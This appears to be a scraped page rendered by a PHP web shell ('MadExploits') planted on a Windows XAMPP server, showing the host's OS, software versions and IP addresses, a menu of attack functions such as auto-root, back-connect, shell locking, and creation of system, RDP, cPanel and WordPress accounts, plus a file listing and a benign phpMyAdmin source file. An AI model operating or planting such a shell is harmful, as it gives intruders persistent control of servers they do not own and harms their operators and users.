Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 18.226.170.19
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
libraries /
classes /
Gis /
[ HOME SHELL ]
Name
Size
Permission
Action
GisFactory.php
1.26
KB
-rw-rw-rw-
GisGeometry.php
12.25
KB
-rw-rw-rw-
GisGeometryCollection.php
11.1
KB
-rw-rw-rw-
GisLineString.php
9.93
KB
-rw-rw-rw-
GisMultiLineString.php
12.52
KB
-rw-rw-rw-
GisMultiPoint.php
12.13
KB
-rw-rw-rw-
GisMultiPolygon.php
18.5
KB
-rw-rw-rw-
GisPoint.php
10.17
KB
-rw-rw-rw-
GisPolygon.php
17.92
KB
-rw-rw-rw-
GisVisualization.php
20.51
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : GisFactory.php
<?php /** * Contains the factory class that handles the creation of geometric objects */ declare(strict_types=1); namespace PhpMyAdmin\Gis; use function strtoupper; /** * Factory class that handles the creation of geometric objects. */ class GisFactory { /** * Returns the singleton instance of geometric class of the given type. * * @param string $type type of the geometric object * * @return GisGeometry|false the singleton instance of geometric class of the given type * * @static */ public static function factory($type) { switch (strtoupper($type)) { case 'MULTIPOLYGON': return GisMultiPolygon::singleton(); case 'POLYGON': return GisPolygon::singleton(); case 'MULTIPOINT': return GisMultiPoint::singleton(); case 'POINT': return GisPoint::singleton(); case 'MULTILINESTRING': return GisMultiLineString::singleton(); case 'LINESTRING': return GisLineString::singleton(); case 'GEOMETRYCOLLECTION': return GisGeometryCollection::singleton(); default: return false; } } }
Close